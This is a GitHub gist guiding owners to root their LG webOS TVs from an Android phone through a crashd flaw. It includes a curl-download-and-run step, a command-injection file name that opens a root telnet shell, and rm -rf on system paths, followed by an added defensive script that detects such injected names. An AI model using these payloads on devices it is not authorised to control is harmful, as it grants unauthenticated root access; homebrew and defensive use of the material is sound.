@PaRaN01a-hash
Last active December 4, 2023 06:33
Crashd Exploit Using Android Phone

DISCLAIMER

I take no credit for the actual exploit, but I wanted to explain how to take advantage of the exploit if you do not have access to a laptop to run Dev Manager. The original guide is taken from https://gist.github.com/throwaway96/e811b0f7cc2a705a5a476a8dfa45e09f#file-crashd-md

INTRODUCTION

This guide explains how to root an LG TV using a vulnerability in crashd, with only an Android phone. It works on webOS 4 and above and is currently unpatched (as of 2023-10-03). This means that as long as your TV is running at least webOS 4.0 (i.e., it is a 2018 model or newer), it should be vulnerable. Anyone attempting this procedure should do their own research in order to understand how the process works. In general, unless you understand exactly why you're doing something, you shouldn't do it. While there is relatively low risk of permanent damage to your TV, you're ultimately responsible if anything goes wrong. This will only work on webOS 4+.

TIPS

For many commands (e.g., touch, mkdir, rm), there will be no output if the command is successful.

The commands involved in this process should complete more or less instantly. If a command hasn't completed after 30 seconds, cancel it and try again.

Make sure Quick Start+ is disabled for rebooting to be effective.

OLEDs may have to be unplugged to properly reboot, as they can remain on for a while despite appearing to be off.

APPS NEEDED

Termius (available on the Google Play Store) - https://play.google.com/store/apps/details?id=com.server.auditor.ssh.client

STEPS

Enable Developer Mode on the TV

1 - Enable Developer Mode on the TV: see the guide from LG. If you have trouble (e.g., not getting the prompt to sign in), try rebooting. A reboot is required after setting Dev Mode Status to ON. The Developer Mode app should look something like this: [image: Developer Mode app]

2 - Install the Termius app on your phone.

3 - Disable Quick Start+ on the TV. This is in the menu, but its exact location depends on the webOS version. For example, on webOS 5, after pressing the menu button on the remote, it can be found in All Settings > General > Additional Settings. On webOS 6 and 7, it is under All Settings > General > Devices > TV Management.

4 - Reboot the TV (e.g., by turning it off and then back on) again. This is in addition to the reboot required when enabling developer mode. Make sure Quick Start+ is disabled! Note: If you have an OLED TV, it may stay on for a while (to run the Pixel Refresher) despite appearing to be off. Thus, when you turn it back on, it won't have actually rebooted. You can unplug it to be sure it's off.

5 - In the LG Developer Mode app, enable the Key Server. It should look like this: [image: Key Server enabled]. Note that the key server only needs to be enabled while you are connecting for the first time. It will be automatically disabled on reboot.

6 - Open a browser on your phone and go to the following page: http://TVIP:9991/webos_rsa

Replace TVIP with your TV's IP address. This downloads the private key file, named "webos_rsa".

7 - Open the Termius app, tap the plus sign at the bottom of the screen, and select New Host.

Fill out the details as follows:

Alias - TV

Host/IP address - IP address of the TV

Tick the SSH box

Port - 9922

Username - prisoner

Key - this is where you need to point the app to the file downloaded in step 6.

Scroll down and tick the Telnet box.

Port - 23

Username - prisoner

Password - alpine

Save all settings.

8 - Now you should be able to connect to the TV using the Termius app. Connect using SSH first. Once connected, run the following commands in the terminal:

  curl -L -o /tmp/hb.ipk https://github.com/webosbrew/webos-homebrew-channel/releases/download/v0.6.3/org.webosbrew.hbchannel_0.6.3_all.ipk

  luna-send-pub -w 10000 -i 'luna://com.webos.appInstallService/dev/install' '{"id":"com.ares.defaultName","ipkUrl":"/tmp/hb.ipk","subscribe":true}'

You should now have the homebrew channel installed on your TV.

9 - Close the SSH terminal and reconnect with the Telnet option. Use "jailpatch.sh" to generate an old "jail_app.conf" with a valid signature.

To achieve this, enter the following command exactly as shown:

 curl -L -o /tmp/jailpatch.sh https://raw.githubusercontent.com/throwaway96/install-jail-conf/main/jailpatch.sh && sh /tmp/jailpatch.sh

Make sure the output says “verification of current conf successful” before continuing.

10 - Reboot the TV (e.g., by turning it off and then back on) for a third time. Make sure Quick Start+ is disabled!

11 - Reconnect to the TV using Termius and the Telnet option. Type the following exactly as shown and press Enter:

 touch /var/log/crashd/"x;telnetd -l sh"

Note: The character after the dash is a lowercase L, not a one. If you get an error like “sh: touch: not found”, just repeat the command. When successful there should be no output. If you get a "Permission denied" error, you probably didn't complete the previous steps regarding “jail_app.conf” correctly or did not reboot afterward.

12 - Again, enter the following exactly as shown into the terminal and press Enter:

 /media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/elevate-service

13 - Execute this command to ensure developer mode never expires (the original had a typo, "m -rf"; the command is rm -rf):

 rm -rf /var/luna/preferences/devmode_enabled && mkdir -p /var/luna/preferences/devmode_enabled

14 - If you have used RootMyTV before (even unsuccessfully), execute this command to remove leftover files:

 rm /var/lib/webosbrew/startup.sh /mnt/lg/cmn_data/wam/extra_conf.sh

15 - Uninstall the Developer Mode app from the TV's home menu. WARNING: Do NOT reinstall the LG Developer Mode app while your TV is rooted!

16 - Power off your TV. Make sure Quick Start+ is disabled!

Note: If an "Install Homebrew Channel" prompt appears (unlikely), don't choose "yes".

17 - After the restart, confirm that "Root status" in the Homebrew Channel is "ok".

18 - Turn on SSH in the Homebrew Channel and restart.

Enjoy your rooted TV!
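Step 11 works because a file name under /var/log/crashd/ ends up being interpreted as a shell fragment ("x;telnetd -l sh"). The script below is an added example, not part of the gist or of throwaway96's guide, written from the defender's side: it flags entries in a directory whose names contain shell metacharacters, which is the artifact this technique leaves behind, and shows the safe way to pass a file name on to another command. The directory path is a parameter, and the sample entries are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original gist. Assumption (inferred from the
# "x;telnetd -l sh" payload, not stated by the gist): crashd builds a shell
# command from the log file name. A defender auditing a TV, or any daemon that
# turns file names into commands, can flag names containing shell metacharacters.

# Print every entry in DIR whose name contains a character a shell would
# interpret (; | & $ ` ( ) < >). Returns 0 if at least one was found, else 1.
find_shell_meta_names() {
    dir=$1
    found=1
    for path in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$path" ] || continue   # skip the literal glob when nothing matches
        name=${path##*/}
        case $name in
            *[';|&$`()<>']*) printf '%s\n' "$name"; found=0 ;;
        esac
    done
    return "$found"
}

# Number of flagged names, for scripts and checks that want a single value.
count_shell_meta_names() {
    find_shell_meta_names "$1" | wc -l | tr -d ' '
}

# The hardened pattern for passing a file name on to another command: hand it
# over as a single quoted argument after "--", never spliced into a string that
# is given to "sh -c". "ls" stands in for whatever the real consumer would be.
safe_handle() {
    ls -- "$1" >/dev/null 2>&1
}

# Constructed demo: one ordinary crash-dump-style name and one injected name.
demo_dir=$(mktemp -d)
: > "$demo_dir/app.core.1234"
: > "$demo_dir/x;id"
if find_shell_meta_names "$demo_dir"; then
    echo "suspicious crashd names found in $demo_dir"
fi
safe_handle "$demo_dir/x;id" && echo "file handled without executing its name"
rm -rf "$demo_dir"
```

Run it against /var/log/crashd on a TV you administer to see whether injected names are present; a clean directory prints nothing from the scan.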

Based on instructions by Shadow0304. Ideas and info based on the crashd guide by throwaway96.
